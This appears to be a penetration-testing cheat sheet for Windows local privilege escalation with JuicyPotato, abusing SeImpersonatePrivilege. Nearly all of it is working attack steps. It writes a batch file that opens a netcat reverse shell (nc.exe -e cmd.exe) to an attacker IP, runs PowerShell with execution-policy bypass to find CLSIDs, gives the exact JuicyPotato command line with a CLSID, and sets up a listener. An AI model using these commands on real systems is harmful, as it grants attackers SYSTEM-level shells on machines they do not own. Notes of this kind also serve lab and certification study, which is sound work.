Juicypotato

Check for SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege if enabled through whoami /priv or whoami /all
Requirement
- Potato exe https://github.com/ohpe/juicy-potato/releases Note: there other exe also other than juicypotato like rotten potato, sweet potato, etc which can be used under certain circumstances https://jlajara.gitlab.io/Potatoes_Windows_Privesc
- Create priv.bat foe reverse privilege shell echo “C:\Windows\Tasks\nc.exe -e cmd.exe <attacker ip> <port>” > priv.bat
- transfer nc.exe /usr/share/windows-resources/binaries/nc.exe
- script GetCLSID.ps1 for finding CLSID https://ohpe.it/juicy-potato/CLSID/ powershell -executionpolicy bypass -file GetCLSID.ps1 > cls.txt Sometime CLSID is not required
Transfer all file on window host
Exploit
- .\JuicyPotato.exe -p "C:\Windows\Tasks\priv.bat" -l 4444 -t * -c {653C5148-4DCE-4905-9CFD-1B23662D3D9E} -l for listening port same as in priv.bat , -c for clsid
- nc -nvlp 4444
Reference
https://medium.com/r3d-buck3t/impersonating-privileges-with-juicy-potato-e5896b20d505
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato

Last updated 1 year ago